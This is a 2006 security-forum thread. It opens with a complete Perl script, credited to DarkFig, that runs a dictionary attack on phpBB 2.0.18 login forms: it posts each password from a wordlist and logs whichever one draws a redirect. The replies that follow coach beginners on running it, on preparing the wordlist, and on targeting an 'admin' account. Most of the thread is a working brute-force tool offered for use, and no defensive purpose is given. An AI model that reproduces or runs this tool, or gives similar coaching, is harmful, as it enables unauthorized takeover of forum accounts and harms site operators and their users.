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IT Security and Insecurity Portal |
phpBB <= 2.0.18 Remote Dictionary Attack Tool |
Posted: Tue Jan 31, 2006 11:41 pm |
syntax9 |
Active user |

Joined: Dec 21, 2005 |
Posts: 33 |
# Will be moved to tools section when completed. /str0ke
# Credits: Weakness and Xploit by DarkFig
# Affected products: All PhpBB versions <= 2.0.18
# Type: Dictionnary attack
# Solutions: None official , but many solutions are possible
# Note: If a line of the dictionnary file contain no data => "End of the password file"
# Ps: Public after 1week lol
#Demo: http://rapidshare.de/files/9574771/phpbb_dict_login.rar.html
# Team: Hackademie [] Acid_Root [] BoD []
# PS: Volcom joyeux anniversaire , bon oki je suis en retard...voila ton cadeau ^^
use IO::Socket;
if(@ARGV != 6){
print "
+------------PhpBB <= 2.0.18 Passwd Dictionnary Attack [] by DarkFig--------------+
+ Usage: phpbb2018btr.pl <host> <path> <port> <pass_file> <username> <logfile> +
+ <host> => The host where PhpBB is installed | [Ex: site.com] +
+ <path> => Path of the PhpBB board | [Ex: /forum/] +
+ <port> => PhpBB board port | [Default is 80] +
+ <pass_file> => File containing words (dictionnary file) | [Ex: dico.txt] +
+ <username> => Username you want to bruteforce | [Ex: MasterLamer] +
+ <file_result> => File you want to log activity | [Ex: results.txt] +
$host = $ARGV[0];
$path = $ARGV[1];
$full = "$host"."$path";
$port = $ARGV[2];
$pass_file = $ARGV[3];
$username = $ARGV[4];
$fileresult = $ARGV[5];
$OK = 0;
$referer = "http://"."$host"."$path"."login.php?redirect=";
$postit = "$path"."login.php";
#--------------Hello world-----------------#
print "
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
[+] Username | $username
[+] Dictionnary file | $pass_file
[+] Attack log | $fileresult
#--------------Password file--------------#
open FILE, "<$pass_file" || die("\n[-] Can't open the file...\n");
chomp(@passdico = <FILE>);
$nligne = "0";
while ($OK ne 1) {
$passwordz = "$passdico[$nligne]";
$request = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion";
$length = length $request;
if ($passwordz eq ""){print "\n [-] End of the password file, no result sorry !\n";close($send);close(FILE);exit();}
#--------------Sending data--------------#
$send = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || die "\n[-] Connection failed...";
print $send "POST $postit HTTP/1.1\n";
print $send "Host: $host\n";
print $send "Content-Type: application/x-www-form-urlencoded\n";
print $send "Content-Length: $length\n\n";
print $send "$request\n";
read $send, $answer, 15;
if ($answer =~ /HTTP\/(.*?) 302/) {
$OK = 1;
print "
[-] Trying the password "."$passwordz
[+] User: $username
[+] Password: $passwordz
open results, ">$fileresult";
print results "
+ PhpBB <= 2.0.18 Passwd Dictionnary Attack -- by DarkFig +
[+] PhpBB board | $full
[+] Board's port | $port
[+] Username | $username
[+] Dictionnary file | $pass_file
[+] Number of test | $nligne
[+] Password found | $passwordz
if ($OK == 0) {print "\n [-] Trying the password "."$passwordz";$nligne++;}}
# milw0rm.com [2005-12-21] |
Posted: Sat Mar 25, 2006 12:19 pm |
Vixje |
Active user |

Joined: Mar 25, 2006 |
Posts: 35 |
This also works on .19 versions?
yes it does  |
Last edited by Vixje on Sun Mar 26, 2006 8:40 am; edited 1 time in total |
Posted: Sun Mar 26, 2006 8:33 am |
anton |
Beginner |

Joined: Mar 26, 2006 |
Posts: 1 |
I'm new in this zone so please be good with me .
How I can use this code ? I see the movie but I don't understand how to launch the code and where to do that
maybe is easy for you but I'm a stupid beginer  |
Posted: Sun Mar 26, 2006 8:41 am |
Vixje |
Active user |

Joined: Mar 25, 2006 |
Posts: 35 |
Copy the text and paste it into a file called f.e. script.pl
now download perl and install it.
now run: perl.exe script.pl, and follow instructions.
gl |
Posted: Tue Apr 18, 2006 12:00 am |
dinho |
Regular user |

Joined: Apr 15, 2006 |
Posts: 16 |
hi guyz
what exactly should i type after C:\perl\bin\file.pl .... !!! |
Posted: Tue Apr 18, 2006 12:22 am |
sljyro |
Advanced user |

Joined: Mar 23, 2006 |
Posts: 53 |
the 6 arguments, each followed by a 'space' |
Posted: Tue Apr 18, 2006 1:10 am |
dinho |
Regular user |

Joined: Apr 15, 2006 |
Posts: 16 |
how do i get these two files
<pass_file> => File containing words (dictionnary file) | [Ex: dico.txt] +
+ <file_result> => File you want to log activity | [Ex: results.txt]
so it should look like this:
C:\per\bin\file.pl localhost.com /forum/ 80 dico.txt admin results.txt
how do i set up dico.txt and results.txt??
thanks in advance brov  |
Posted: Tue Apr 18, 2006 12:19 pm |
Chb |
Valuable expert |

Joined: Jul 23, 2005 |
Posts: 206 |
Location: Germany |
dinho wrote: | how do i get these two files
<pass_file> => File containing words (dictionnary file) | [Ex: dico.txt] +
+ <file_result> => File you want to log activity | [Ex: results.txt]
so it should look like this:
C:\per\bin\file.pl localhost.com /forum/ 80 dico.txt admin results.txt
how do i set up dico.txt and results.txt??
thanks in advance brov  |
dico.txt should contain just a wordlist. This means a list with a lot of words which should be checked if they're the admin-password.
And result.txt... Just for logging. This file should be empty. |
Posted: Tue Apr 18, 2006 1:27 pm |
sljyro |
Advanced user |

Joined: Mar 23, 2006 |
Posts: 53 |
you can get a dictionary file here (3mb txt file)
but take note that these are only words, if the password contains a capital letter, number or it's not a word, its useless. main disadvantage of this type of hack i would say.
and another issue, when i try this, i keep getting disconnected after a minute or so, dont know why  |
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